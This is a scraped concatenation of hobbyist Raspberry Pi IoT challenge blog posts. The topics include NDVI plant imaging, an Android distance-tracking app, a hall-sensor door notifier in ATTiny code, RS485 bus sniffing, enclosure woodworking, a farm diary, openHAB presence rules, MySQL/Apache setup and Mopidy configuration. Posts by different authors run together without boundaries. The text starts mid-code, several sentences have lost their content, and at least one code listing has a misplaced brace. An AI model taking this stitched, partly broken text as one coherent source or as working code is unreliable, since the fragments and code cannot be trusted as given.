seconds for a keypress cv2.waitKey(10000) # cleanup cv2.destroyAllWindows() rawCapture.truncate(0) # get current date and time to add to the filenames d = datetime.datetime.now() datestr = d.strftime("%Y%m%d%H%M%S") # save all images cv2.imwrite("./images/" + datestr + "_noir.jpg",noir_image) cv2.imwrite("./images/" + datestr + "_color.jpg",color_image) cv2.imwrite("./images/" + datestr + "_ndvi.jpg",ndvi_image) cv2.imwrite("./images/" + datestr + "_gndvi.jpg",gndvi_image) cv2.imwrite("./images/" + datestr + "_bndvi.jpg",bndvi_image) The prove of the pudding is the eating, so here are the images you have been waiting for so long. Here is a video of the setup. In front of the camera are a hydrangea plant and two roses. The color image. The NoIR image, which is the NoIR camera with the infra-blue filter attached. Note the different perspective on this small distance. The two images are aligned using the HOMOGRAPHY algorithm, which you can clearly see in the blue border below. A drawback of the HOMOGRAPHY is that it is quite time consuming. In this case, the ECC algorithm took almost 15 minutes . The NDVI image clearly shows healthy plant parts in read, while other stuff is in the blue-green range. Note that the roses looks like very unhealthy! This is true, because they are fake. The BNDVI and GNDVI doesn't look very promising, I will investigate in this later. I also took my camera outside, powered by a USB power bank. With the following results: Here I used TRANSLATION for the alignment which works pretty well for objects at larger distance from the camera. It also is much faster, less than 30 s computation time in this case. This finalizes more or less my project. I will try to make a summary blog on Monday, but yet I'm not sure I will have time for that. I hope you enjoyed my posts and it inspired you to use the Pi for agricultural applications and plant phenotyping. Feel free to comment or ask questions, I will try to answer them all. This. Initial setup:Nexus 5 - Android 6.0.1 Full code in github - SmartApp When launching, the user will be able to select one of our two activities: The GUI is constantly updated to show: Additionally, this information is stored in a local database in the phone. PODIUM (Not enabled yet) > request other residents information from the server and see current state of the competititon To access GPS Location - we use Android Location library (android.location) More in detail, the app uses of its classes: The app needs to obtain current location, compare it with the previous one and extract the distance. This distance will then be updated in the main GUI and included in monthly and daily calculations. To count the steps we make use of the hardware Android library(we will use accelerometer data). CountSteps implements SensorEventListener, with the meethods:; } } As with any other step counter, if you shake the device the number of steps increases. We will need other methods to determine whether the person is really moving or not (aka GPS location). !! Please see the following video showing the first running of the application In this post I explained how to create an Android application to track the traveled distance. This is the main app of the competition system. It will: This update should help navigate through the next posts: it's been a long period without any news and I will be quite active for the next days... I hope the final result does not look very confusing ^^u The innovation part of this project is the competition system: we want to engage the residents of the house in a competing environment to promote a healthier way of life. It can later be expanded for more fun type of activities. For now, the only challenge presented to the roommates is the amount of km walked/run/biked during a month. This information will be gather thank to a mobile phone application and be sent to the smart house central node. In the end, the smart house main GUI will have the regular smart house information plus current status of the competition. The following image shows the basic structure of the system (with only one user included): NOTE: The house wifi router will be performing the corresponding port forwarding to the Central Node and its competition port. Initial setup:Nexus 5 - Android 6.0.1 We will update the original User's node, so that it hosts: It will be divided in three main functions: I will be modifying the original application. It is a basic Android app that connected to the MQTT broker and display the smart house values upon request. First, this apps functionalities will be included in the Smart Home Activity to be enhance later on, with: Initial setup: Raspberry Pi 3 - Raspbian SO (Jessie) / SSH Enabled / Mosquitto MQTT Broker installed / MQTT Subsciber client / Console interface / Python GTK interface / MySQL Server / Apache2 web Server In the central node, I will have to implement the Competition Service. This service will manage the income packages from each roommate (containing the distance update) and update it in the MySQL database. The main Python scripts (managing the MQTT_client_subscriber and Main GUI) will include functions to read the competition values from the database and update the Interface accordingly. The developing of the competition system will require: This post will cover the doors and windows notifier Previous posts: Pi IoT - Simone - Introduction Pi IoT - Simone - #1 - Light Controller Pi IoT - Simone - #2 - Main System For this part of the project I initially wanted to use the EnOcean Hall Sensor since it seamed the easiest and most non intrusive way to do it but unfortunately the sensor is on a different frequency so it does not connect to the receiver. Instead I used the I2C connection protocol from the light controller for this. The system has three components: 1. The hall sensor with the ATTiny controller that feeds the data through I2C to the main system. 2. The main system that receives the data and calculates if the door is opened or closed 3. A magnet that will be glued on the door. 1. The sensor component should be positioned on the door frame is such a way that it would be possible for the magnet on the door to get close to it when the door is closed. (You can place it inside the door frame if you carve a hole in it and because it is a magnetic sensor you can actually cover it up afterwards so you do not see it) I used for this an AT Tiny 84 SSU and and as a hall sensor I used an SS495A HONEYWELL . This is not really a very exact sensor but it serves it's purpose for this project, it actually makes the difference between tiny movements of the magnet that is close to it. 2. The controller for the sensor should only read the data and send it to the Main Server on the Raspberry PI when it is requested. The calculation behind this is made from the raspberry. To calibrate the system a logic can be inserted into the application that would require you to close the door so it can see what is the value it receives when the magnet is positioned closest to the sensor. Then the application will take that value as a default closed values and any other input will be considered opened. 3. The magnet should be positioned on the door so when it is closed the magnetic field would reach the hall sensor sending data to the main system. NOTE: As I said, initially I wanted to use the EnOcean sensor for this. As I described in the main system there can be more than one Raspberry PIs and one I used to make the connections to the EnOcean devices, then connect to the main system as a client and feed data to it. This would have solved some issues and the biggest one is that no more wires would have been needed. The code for the micro controller: //#define _DEBUG #ifdef _DEBUG #include <Wire.h> #else #include "TinyWireS.h" #endif #include "I2CTypes.h" #define SLAVE_ADDRESS 0x10 const int analogInPin = A0; static const String c_identification = "2#10#1#Usa Balcon#0"; int m_freeMemory = 0; uint8_t m_i2cMessageData[32]; int m_i2cMessageDataLength; int m_messageCounter; uint8_t m_dataArray[32]; int freeRam() { extern int __heap_start, *__brkval; int v; return ((int)&v - (__brkval == 0 ? (int)&__heap_start : (int)__brkval)) / 4; } void setup() { pinMode(1, OUTPUT); // initialize i2c as slave and define callbacks for i2c communication #ifdef _DEBUG Wire.begin(SLAVE_ADDRESS); Wire.onReceive(receiveData); Wire.onRequest(sendData); #else TinyWireS.begin(SLAVE_ADDRESS); TinyWireS.onReceive(receiveData); TinyWireS.onRequest(sendData); #endif m_i2cMessageDataLength = 0; m_i2cMessageData[0] = 0xFE; #ifdef _DEBUG Serial.begin(9600); #endif } void loop() { #ifdef _DEBUG m_freeMemory = freeRam(); Serial.println(analogRead(A0) * (5.0 / 1023.0)); delay(1000); //Serial.print("Memory: "); //Serial.println(m_freeMemory); #else TinyWireS_stop_check(); #endif } void sendData() { uint8_t byteToWrite = 0x05; byteToWrite = m_i2cMessageData[m_messageCounter]; m_messageCounter++; if (m_messageCounter >= m_i2cMessageDataLength) { m_messageCounter = 0; } #ifdef _DEBUG Wire.write(byteToWrite); #else TinyWireS.send(byteToWrite); #endif } // callback for received data #ifdef _DEBUG void receiveData(int byteCount) { #else void receiveData(uint8_t byteCount) { #endif uint8_t index = 0; #ifdef _DEBUG while (Wire.available()) { m_dataArray[index] = Wire.read(); index++; } #else while (TinyWireS.available()) { m_dataArray[index] = TinyWireS.receive(); index++; } #endif processMessage(); } void processMessage() { m_i2cMessageData[1] = m_dataArray[0]; switch (m_dataArray[0]) { case SW_Ping: m_i2cMessageDataLength = 4; m_i2cMessageData[2] = 0; m_messageCounter = 0; break; case SW_Identify: int length; length = c_identification.length(); m_i2cMessageDataLength = 3 + length; for (int i = 0; i < length; i++) { m_i2cMessageData[2 + i] = c_identification[i]; } m_messageCounter = 0; break; case SW_Restart: break; case SW_Get: int sensorValue = analogRead(analogInPin); m_i2cMessageDataLength = 3; m_i2cMessageData[2] = sensorValue; m_messageCounter = 0; break; default: m_i2cMessageDataLength = 4; m_i2cMessageData[2] = 0; m_messageCounter = 0; break; } } m_i2cMessageData[m_i2cMessageDataLength - 1] = 0xFF; } Not all blog posts can be about successful implementations or achievements. Sometimes, failure happens as well This is the case for my domotics implementation. Does that mean I have given up on getting it to work? Certainly not, but I'm stuck and don't have to luxury that is time, so close to the deadline with plenty of other things left to do. Here's what I did manage to figure out so far ... As you may or may not know, I moved house during the challenge, beginning of July. The new house has a domotics installation by Domestia, a belgian domotics brand from what I could find. The installation consists of two relay modules, capable of turning lights and outlets on or off. There are also two dimmer modules for lights. When we started replacing the halogen bulbs by LED ones, we noticed the dimmers no longer worked, and had to replace the dimmers by LED compatible ones. Next to the electrical wires, the modules have a three way connector labeled A, B and GND. Searching the datasheets, it is explained the domotics modules are connected to a RS485 bus for communication. The wiring is illustrated in the module's manual: The RS485 bus could be an entry point in reading the lights or outlets' status, and eventually control them. Here's what it looks like in real life: The RS485 bus can be accessed via the dimmer's blue, green and orange wires, labeled A, B and GND. According to this, the pins' functions are the following: I started by first connecting my oscilloscope to the bus, verifying there is activity. Probe 1 was connected to line A, probe 2 to line B. This is what I saw: Three things can be observed/confirmed at a glance: Knowing there is data present, I could perhaps find a script or piece of software able to decode the data. For that purpose, I bought a generic RS485 to Serial USB module. Using a basic serial tool, I was able to dump the raw hexadecimal data. A new observation, is that every new line, starts with the hexadecimal value "0x0C". With a script I found and modified to suit my needs, I captured the raw data and jumped to a new line every time the "0x0C" value appeared. #!/usr/bin/env python # Original script from # Modified to print full hex sequences per line instead of individual values import serial import binascii import time ser = serial.Serial() data = "" def initSerial(): global ser ser.baudrate = 9600 ser.port = '/dev/tty.usbserial-A50285BI' ser.stopbits = serial.STOPBITS_ONE ser.bytesize = 8 ser.parity = serial.PARITY_NONE ser.rtscts = 0 def main(): initSerial() global ser global data ser.open() while True: mHex = ser.read() if len(mHex)!= 0: if not binascii.hexlify(bytearray(mHex)).find("0c"): print data data = binascii.hexlify(bytearray(mHex)) else: data = data + " " + binascii.hexlify(bytearray(mHex)) time.sleep(0.05) if __name__ == "__main__": main() Some of the captured sequences:a 08 ff 08 fe 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 fe 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 fe 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 fe 85 ff 0c 08 08 08 08 0a 08 08 0a 08 08 18 08 a8 08 fe fe 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 85 ff 0c 0a 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 fe 0c 08 08 08 08 08 08 08 08 08 08 18 08 aa 08 fe 85 ff 22 20 0c 08 08 08 08 0a 08 08 08 18 08 a8 08 ff 84 ff 0c 08 0a 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 85 ff 22 20 0c fe 08 ff 0c 08 08 ff 85 ff 0c 08 08 08 08 08 08 08 08 08 08 18 0a a8 0a fe 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 fe 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 0a ff 08 fe 0c 08 08 08 08 08 08 08 08 08 08 1a 08 a8 08 ff 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 85 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 fe 08 fe 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 fe 0c 08 08 08 08 08 08 08 08 08 0a 18 08 a8 08 ff 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 fe 08 ff 22 20 0c 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 ff 0c 08 08 08 08 08 0a 08 08 08 08 18 08 a8 08 fe 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 fe 22 20 There is a very repetitive pattern, with occasionally different values. But what does it do or mean? This is where I got blocked. This is a bit too low-level for me, so any help would be greatly appreciated! Before being able to go any further, I need to be able to make sense of the data. Until then, this feature will be parked. The goal is still to be able to control and monitor the domotics, but sadly It most likely won't be achieved in this challenge. Now, if you do have knowledge or know about tools which could help me further, feel free to leave a comment below No time to go out on a Friday night, only a couple of days before the challenge's deadline. Instead, I decided to annoy the neighbours by doing some final milling and sanding ... So, as promised, here's the enclosure for the second control unit. Unlike the alarm clock, this unit makes use of a touch screen and keypad for user input, on top of the voice commands. Because of these components, it is also quite larger than the alarm clock. It will be sitting on the cabinet. Here's what I've done with it and how I got there ... This unit was too large to cut solely with the CNC. The board to cut from was so large I couldn't clamp it normally and had to resort to alternative methods demonstrated below. The CNC was used to mill the slots in the front and top panel, just the maximum supported width of my CNC. To actually cut the different panels out of the board, I used the classic method: the table saw. Using the router, I manually made the grooves, trimmed the pieces to fit and rounded the edges. Using some wood glue and clamps, the pieces were attached to each other. This unit required a lot more manual work than the alarm clock, but was clearly faster for some actions, though not always as accurate as the CNC. I suppose accuracy in manual actions comes as experience is gained. Milling acrylic using the CNC required a few attempts before achieving clean results. During the initial runs, the mill's feed rate was too low, causing the acrylic to heat up too much, melt and stick to the milling bit. This in turn, caused damage to the piece because of the molten blob swinging around. By increasing the feed rate to 1000mm / min, with passes of 0.7mm, the mill travelled fast enough to cut without melting, resulting in clean cut pieces, as demonstrated below. To compensate for possible inconsistency issues due to the manual cutting and assembling of this enclosure, the side panels would have to be measured and drawn individually for milling. A much easier and faster approach was to glue a slightly larger, roughly cut piece of acrylic to the sides and use a flush trim router bit. The flush trim bit has a bearing which follows the shape of the wooden enclosure it is rolling on, while cutting the acrylic to the same shape. Before and after a manual flush trim: A bit of sanding will ensure everything is smooth and soft to the touch. So, after all the sanding, glueing, filling, milling, etc ... I showed it to the wife, and I was allowed to put it on the cabinet Here's the result: It's a bit of a pity the touch screen's border is black. I'm thinking I could get some white film to stick on the edges of the display, giving it a white border. By the way, I feel it looks like a microwave or retro TV. Can anyone confirm or deny this?? This Morning's Bounty of Fowl investments! The 3 on top are Duck eggs, only 1 was laid today but I wanted to give comparison for size to the Chicken Eggs. The Element 14 pen is also for size comparison. But John, you don't have any Chicken's laying yet do you? There lies the story in regards to Yesterday... Yesterday was an interesting day on the IoT Farm. The previous night while I was working my swing shift, my better half shared that she had found a lady giving away 5 laying hens and a coop to go with them. But it sounded like there was so much interest in it that the outcome was uncertain. So I continued my working on the Raspberry Pi B and using MotionEyeOs with the Noir Camera and 2 new USB cameras that just came in. Everything connected fine up to the point of trying to go from hardwired to the WiPi usb adapter. So this had my attention as I am continuing to try and troubleshoot since the WiPi is esssential. Side note, there is a big difference in response between the RPi 3 and the RPi B running MotionEyeOs. Patience is a must using the B. After 6 hours of sleep I was up and running again, getting Kiddos ready for school and planning my day for working on the Farm Operations Center assembly. I have been playing with just the basic setup of the 7" touchscreen with RPi 3 attached to the back but want to come up with an actual container in case I want to move it about the Farm. So a F.O.C. Box is in the plans! This is what greeted my wife in the morning through the newly installed sliding Duck Door. She was very Happy! Easy Egg Extraction! Okay, 2 daughters safely at school courtesy of bus and one son delivered to his school, now time for working on the F.O.C. Box! Walmart has all of their school supplies drastically reduced and I had noticed my kids having some various sized plastic pencil boxes that looked intriguing. So $1.13 later I have a variety of sizes and colors to play with! Fun times await! 25 cents and 10 cents per box depending on size, very nice! Meanwhile my wife had heard back from the lady with 5 laying hens. Yes they are available for her if we can go pick everything up. So time to unload the Truck and make sure all straps and accessories are ready to go. It took a bit but we caught all of the hens, loaded them into a Kennel/Carrier and also loaded the Chicken coop into the back of the Truck. She even threw in another female rabbit with food for both rabbit and hens. Due to the size of the Coop the tailgate had to stay down and everything was strapped/secured quite tightly. It seems we were an interesting sight as we picked up our son at the school. It isn't everyday someone pulls up with a Chicken Coop in the back of their truck, complete with live Chickens. Interestingly enough our son was NOT surprised. :-) He just hopped in and started talking to the rabbit. who was in a little carrier by his seat. Doesn't every family collect farm animals like Old McDonald? Arriving back at the IoT Farm everyone was quite interested in our new additions. Even the G.O.A.Ts were interested in helping in their own special way. I even got some supplies to play with, she had 10 Chicken Nipples that she gave me that I am going to use with pvc piping to run water to the animals! There you can see the F.O.C. in it's base form ready to be placed into a box. Here are the new Ladies being introduced to the full sized Chicken Casa. Here is the new Coop in place. A quick check of it and we want to add some sturdier latches and start some serious weather proofing. And yes, another sliding door has now been added to the to-build list. :-) While we headed out for my son's special tutoring that evening a little rain storm rolled through. Here are the new Ladies checking everything out after the rain. By the time we managed to get all of the various animals locked down for the evening I had a couple of inches of wet clay on my running shoes. Note to self: buy some waterproof mud boots for future weather conditions. We had been concerned that with the new move and new location the birds would all be quite upset and we may have some chaos for a bit on the IoT Farm but as you can see from the egg picture they have all managed to settle in. Those 5 Ladies provided us 4 eggs and apparently challenged the other birds since 1 of them laid our first chicken egg from our original chickens! Very cool! And here is a picture of our Vane Chicken roosting out on the fence as I finished up outside for the evening.. Schema heater.basic (generally sent to heater clients) Message type: command Message body: request=start|stop|restart|status Schema heater.report (generally sent by clients when state or time changes) Message type: trigger or status Message body: heater=on|off remaining=#minutes Each hangar device will periodically send a "heartbeat" to let other concerned listeners know that it is still available. When a heater needs to be turned on, a request is sent from HangarControl to a single hangar.: The xPL protocol has been codified and comes in at a paltry 796 lines of (mostly) readable Python! I have attached it for your perusal. While I don't imagine you want to read it all, some interesting points would be: One (in my case by Estimote) are little Bluetooth LE devices which on regular intervals broadcast their identifiers. Mobile apps can use this as a way of determining their location. They can be used in several ways. The three most common ways are:. To optimize the Thuis rule engine it needs to have knowledge of what happens around. One of the useful things to now is who is where and when. We'll use presence monitoring to determine who is currently where in the house.. As always we want to publish our data through MQTT, so the other Thuis nodes can use it as well. In [Pi IoT] Thuis #10:! In these last days I have implemented three new features of Phase 2 that will make DomPi more useful to my family: determine who is at home, welcome the family when we arrive home and send an alert if the average temperature of the apartment is either too high or too low. Let´s have a look at them! Previous Posts Project Status This feature allows DomPi know, not only know if there is somebody at home, but also who is there. The best solution as of now to implement this, is to check whose mobile phone is at home. I know this has some drawbacks like, what if the phone is off or if we left it at home... To partially sort out this problem, DomPi also leverages the motion sensors to limit the impact of it and make it more reliable. Let´s have a look at all this. At the beginning, I thought of using the command line (via the executeCommandLine function from openHAB) and then parsing the output of the "ping" in the RPI. While I was working on this, I have come across an existing binding in openHAB that has made the development much easier and faster It is the Network Health Binding, some more details here. This binding connects an item in openHAB with the status of any device or host in general. You could for example check the "network health" of your RPI to communicate with or for instance. For DomPi, I am controlling the network connectivity to the IP´s of our mobile phones. Let´s review the installation and initial config of the binding and have a look then at the implementation. As with any binding, you just need to download the binding in itself (the best approach is to download all of the addons from here as commented in previous posts) and copy the relevant binding (in my case the .jar file is: org.openhab.binding.ntp-1.8.3) into the openhab/addons folder. To perform some fine tune, you just need to modify some of the lines in the openhab.cfg file: # Cache the state for n minutes so only changes are posted (optional, defaults to 0 = disabled) # Example: if period is 60, once per hour the online states are posted to the event bus; # changes are always and immediately (refresh interval) posted to the event bus. # The recommended value is 60 minutes. networkhealth:cachePeriod=60 # refresh interval in milliseconds (optional, default to 60000) #networkhealth:refresh=60000 At the end, I modified the line 5 here and uncommented. By allowing the cache, the binding gets the status of the devices as always, and only updates the item if there is a change in the status. This means, there will only be updates if the phones go out or in range. With no cache, there would be updates posted to the openHAB bus every refresh interval (60s as per line 7). I don´t need to overload the bus with this information, but also if you add persistance, there would be a huge volume to store all of these updates in the HDD... In any case, the binding will update the devices status every hour. All in all, with the cache enabled, openHAB will let me know if the devices go from ON to OFF or viceversa and also every hour it will send an update. I kept the networkhealth refresh (line 8) with the default value. Potentially, you can connect directly an item to the binding and just display in openHAB its status. Something like this: Switch Papa_tlf_nh "Papa Network Binding" <present> (gStatus, gPresencia_casa_nh) nh="192.168.1.140" } This would display a switch showing if the mobile phone is in range or not. However, this would not be optimum. It seems that my mobile phone goes into sleep mode with the Wifi, probably to save up battery. I have not stress-tested but I guess while on sleep mode, it will not reply to pings. The solution I have implemented is to apply a double level of switches: one as above connected directly to the binding and yet another one controlled by an openHAB rule. The rule will get the updated status from the first level switch. When it is in range, it will directly update the second level. However, when it is out of range, it maybe that the phone is on sleep mode. Therefore, it will wait 8 minutes. If within this time, DomPi has not seen the phone in range, it determines that the user/phone is out from home. The description of the second level switch is this: Switch Papa_tlf "Papa" <present> (gStatus, gPresencia_casa) And the rule is here: rule "Presence Identification - Father" when Item Papa_tlf_nh changed then //If the temporary item Papa_tlf_nh has changed to ON, //we directly update the final item Papa_tlf and cancel the relevant timer if exists if (Papa_tlf_nh.state==ON) { postUpdate(Papa_tlf, ON) if (timer_presenceID_papa!= null) { timer_presenceID_papa.cancel timer_presenceID_papa = null } } else if (Papa_tlf_nh==OFF) { //If it is OFF, it can be that the phone is saving battery on Wifi //Let´s allow 8 minutes since the last time it was updated before putting presence to OFF if (timer_presenceID_papa == null) { //if there was no timer until now, create it timer_presenceID_papa = createTimer(now.plusSeconds(480)) [| //Allow 8 minutes and modify Papa_tlf item if (Papa_tlf_nh==OFF) postUpdate(Papa_tlf, OFF) if (timer_presenceID_papa!= null) { timer_presenceID_papa.cancel timer_presenceID_papa = null } ] } } end The drawback of this implementation is that I need a rule per phone to control. In the end I am just planning to monitor two phones so it won´t be a big issue. However, I need to review openHAB's capabilities as I am sure I can condense all the devices to monitor into a single rule. I will look into this when optimizing the code, after the Challenge unfortunately... You can see some snapshots below with this feature. The line Quien esta en casa? => Who is at home? summarizes in the Main Menu how many people are there. It is a clickable item that takes you to the right hand side submenu with the details. With this, I intend to execute some actions when somebody has arrived home. At this stage, the action is to turn on the lights of the living room and the parents´ bedroom and in the next development it will also turn on the TV and switch it to the TV channel we usually watch. This can be very useful to us, as you can have some light at the end of the corridor without having to walk till there. Also the light in our room takes time to be fully lit, so it is good as well to turn it on some minutes in advance. I have written the code and split it in four openHAB rules. It all starts by determining when the apartment is empty. Since it is after the flat is empty when it makes sense to wait for the family and welcome them warmly or at least "lightly". The first rule is quite straightforward: //This rule determines if there is presence at home rule "Detect any presence at home" when Item Nodo09MotionDetected changed from OFF to ON or Item Papa_tlf changed from OFF to ON or Item Mama_tlf changed from OFF to ON then if (Someone_at_home.state!=ON) postUpdate(Someone_at_home, ON) end If there is movement, or DomPi discovers any phone at home, then we determine that there is a family member. This assumption has to be fine tuned in the future: what about if we forgot the mobile phones, etc. It may happen that there is motion detected because a burglar broke in... We should not welcome him or her This is controlled by another rule, that checks the status of the Alarm Switch, if it is on, then we won´t trigger the welcome feature: rule "Welcome home family" /*If someone has arrived home and there was nobody before inside, let´s do: * Turn on light in the living room if luminosity is low * Turn on light in the parents bedroom if luminosity is low * Improvements: turn on TV and say hello */ when Item Someone_at_home changed from OFF to ON then if (Nodo09AlarmSwitch.state==OFF) { //Reconfirm that the alarm switch is off - it can be that rule "Detect any presence at home" //has changed Someone_at_home, but alarm is active say("Welcome at home!!") //Let´s be nice to the family even if no lights needs to be turned on ;) if (gLuminos.state<50) { //Average luminosity is low, lets turn on the lights postUpdate(Lampara_2, ON) //Parents light postUpdate(Lampara_3, ON) //Living room light } } else if (Nodo09AlarmSwitch.state==ON) postUpdate(Someone_at_home, OFF) end //We avoid welcoming burglars! As you can see in lines 15 to 18, before turning on the lights, it checks the average luminosity in the apartment, taking into account only the luminosity from the sensors in the flat: kids, parents and living rooms. If the average is below 50%, it turns on the lights. I will adjust this value after some days testing it. The last two rules determine whether the family came back home or left home. They will update the item Someone_at_home accordingly: //This rule determines if there is nobody at home and if so updates item rule "Did family leave home" when Item Someone_at_home changed from OFF to ON //Thread launched as soon as we determine someone is at home. //It will start to check the conditions to determine that there is noone at home then if (timer_presenceat_home!= null) { timer_presenceat_home.cancel timer_presenceat_home = null } while (Someone_at_home.state==ON) { //if there is no motion detected and all of the members from gPresence_casa (Mama and Papa) //are in the state OFF, which means they are not at home, then execute the loop inside if (Nodo09MotionDetected.state==OFF && (gPresencia_casa.members.filter(s | s.state==OFF).size==0)) { //Wait 30 mins and check again if there was any movement //this long delay helps to avoid issues if somebody is in the bath, etc timer_presenceat_home = createTimer(now.plusSeconds(1800)) [| if (Nodo09MotionDetected.state==OFF && (gPresencia_casa.members.filter(s | s.state==OFF).size==0)) { //Still no movement -> modify item postUpdate(Someone_at_home, OFF) } if (timer_presenceat_home!= null) { timer_presenceat_home.cancel timer_presenceat_home = null } ] } if (Someone_at_home.state==ON) Thread::sleep(120000) //Every 2 mins determines if someone is at home } end rule "Did family come back home" when Item Someone_at_home changed from ON to OFF //Thread launched as soon as we determine nobody is at home //It will start checking the conditions to determine that somebody entered home //Conditions to determine someone at home: // if there is a mobile phone in the wifi range //There is no need to check if any mobile phone appears in range via the Network Binding //since there is already a rule ("Detect any presence at home") that would modify the //item Someone_at_home to ON // if there is motion detected and 1)the alarm is not active, or 2)alarm is active but // user turns it off within time limit then while (Someone_at_home.state==OFF) { if (Nodo09MotionDetected.state==ON) { if (Nodo09AlarmSwitch.state==OFF) postUpdate(Someone_at_home, ON) else { //val t_delay = t_delay_trigger_alarm * 1000 + 200 Thread::sleep(60200) //Wait the 60 secs plus 200 ms to allow some updates //Change with t_delay_trigger_familyhome if (Nodo09AlarmSwitch.state==OFF) postUpdate(Someone_at_home, ON) } } if (Someone_at_home.state==OFF) Thread::sleep(10000) //Sleep for 10s before checking again } end This feature notifies me per email if any temperature sensor at home is below 20ºC or above 27 ºC. Many thanks to jkutzsch who gave me the idea back in May, at the very beginning of the Challenge. Finally, I can implement it I have implemented it in a single rule. If the alarm is triggered and the email sent to myself, then the rule launches a timer to wait for 1h before sending again any notification: I want to avoid spamming myself! /* * Rule to send an email warning if temperature at any room is out of a given range */ rule "Notify of extreme temperature at home" //If any room is below 20ºC or above 27ºC send notify per email when Item gTempers received update then //First step to check if the timer is not null, this implies that there was an email already sent and //DomPi is waiting some time (1h-2h) before resending the notification if (timer_extreme_temperature_alarm==null) { //no timer - we can send the email if required //check values of the temperature sensors from home (interiors only) gTempers?.members.forEach(tsensor| { if (tsensor.state>=27) send_alarm_high_t = true if (tsensor.state<=20) send_alarm_low_t = true } ) if ((send_alarm_high_t) || (send_alarm_low_t)) { //Send email with the alarm and then create the timer var String email_subject ="" var String email_body ="" if (send_alarm_high_t) { email_subject = "Alta temperatura en Casa. Alarma" email_body = "Detectada alta temperatura en casa" } if (send_alarm_low_t) { email_subject = "Baja temperatura en Casa. Alarma" email_body = "Detectada baja temperatura en casa" } sendMail("XXXX@gmail.com", "DomPi - " + email_subject, email_body) timer_extreme_temperature_alarm = createTimer(now.plusSeconds(3600)) [| //Wait 1h and then just remove the timer to allow next notification as required if (timer_extreme_temperature_alarm!=null) { timer_extreme_temperature_alarm.cancel timer_extreme_temperature_alarm = null } ] } } end As I continue to run through the existing rules, I find ways to improve on them. Below a summary of the news this week: More items turning into Green!! Up: To generate a temperature gauge, there is the additional file gauge.py NOTE - An extra file will be required to get the competition house information.). I created a new account in their webpage (as a free user) and started playing. Each account comes with a username and a key, which has to be included in the code using the platform or the environment.!). This interface has three frames: 1. CONNECTION STATUS Shows whether we are connected to the broker and which local IP we are using If connection was not established, we can enter and try a different local IP 2. SMART HOUSE Displays:. The next step for our central node is to host a server. After the setup, it will provide: Next sections describe how to install each of the new capabilities. service mysql stop sudo mysqld_safe --skip-grant-tables sudo mysql --user=root mysql FULL TUTORIAL: The command to install the packages is: sudo apt-get install apache2 php5 libapache2-mod-php5 Afterwards, we will have in the main node:) Regarding MySQL and Apache servers, here are some useful commands: RESTART THE SERVICE sudo service mysql restart START THE SERVICE sudo service mysql start STOPPING THE SERVICE sudo service mysql stop. For the competition system to work, our central node will be receiving each roommate status through the Internet. This information will be then stored on the database so that the main program (the previously developed Python GUI) can access it. This will be done in PHP: With this post, the setting up of our central node is completed!! There is still much development to do on top of that!! Internet of things is about connecting connecting th things around you in a meaningful way. Last few posts, I showed how to connect and monitor a few sensors inside the home using raspberry pi. Now it's time for a little entertainment. After the basics in home, I believe it's going to be our entertainment systems coming to online. In this post, I'll explore the idea of an internet connected music player with raspberry pi. Enter Mopidy Mopidy is much more than a normal music player. I makes your music device accessible from web and also enables it to stream content from web like spotify, Google Play Music etc., The best part - you can access your music player from your smartphone or tab or from PC. This is how it's going to work - Mopidy is going to run on your raspberry pi (I'm using Pi3). It will be working as a daemon(background process) in your pi. And your Pi must be connected to a network. Noe you can access the Mopidy UI using any of you devices - either phone, tab or another PC. It's basically like bluetooth streaming experience except that it won't drain you battery But the catch is your music files should be either available in your rPi or should be played from cloud. Hardware Setup The hardware setup is really simply. You have to connect a speaker to your 3.5mm jack. I'm using an USB powered speaker, which I power from the Pi. Software Installation Although there is an official apt repository method for installing Mopidy on Pi, I will be following the pip method. The version in apt repo is seems to be old - 0.19, while the one using pip is new - 2.x First thing to do is to install all the gstreamer dependencies in Pi. Use the following command to install the dependencies: sudo apt-get install python-gst-1.0 gstreamer1.0-plugins-good gstreamer1.0-plugins-ugly gstreamer1.0-tools gir1.2-gstreamer-1.0 gir1.2-gst-plugins-base-1.0 Now we can go on to install Modpiy using pip. Use the following command to install: sudo pip install Mopidy This will install Mopidy music server in your Pi. Before using it, we have to configure Mopidy to be able to access from other devices. This will be particularly helpful if you are running Pi headless. Other thing is, once you configure these access you will be able to control music player from your mobile phone or other PC also. To edit the configuration: nano ~/.config/mopidy/mopidy.conf Basic structure of the file is going to be section in square braces ( eg [core] ) and options under it. First to be able to access mopidy from outside, you need to enable MPD and HTTP section. Navigate to the sections and modify them as given below: [mpd] enabled = true hostname = 0.0.0.0 port = 6600 password = max_connections = 20 connection_timeout = 60 zeroconf = Mopidy MPD server on $hostname command_blacklist = default_playlist_scheme = m3u [http] enabled = true hostname = 0.0.0.0 port = 6680 static_dir = zeroconf = Mopidy HTTP server on $hostname Now you will be able to access your Mopidy from any devices. Next you have to install clients to be able to access them. First we'll configure a webclient so that we can access Mopidy from PC/tablet/phone. You can get a non-exhaustive list of webclients for mopidy from . For this project, I chose to use 'Musicbox_webclient'. To install it, just enter: sudo pip install Mopidy-MusicBox-Webclient Now you will be able to access your Mopidy from any of the web clients from any devices. Now you can go to http://<Pi's IP>:6680 and you will see a page like this: This page should show all the available webclients for Mopidy. Here I have only one. You can click on it and will be taken to a page like this: From this point, it will behave as a normal music player. You will be able to browse you local music files and play them using this UI. Let's Party Here is a small demo of how I'm using Mopidy using MusicBox client from my android mobile. It is the webclient itself, but I created a shortcut to my home screen so that I can open it easily. Happy Hacking, vish << Prev | Index | Next >> Today a quick note on how to connect 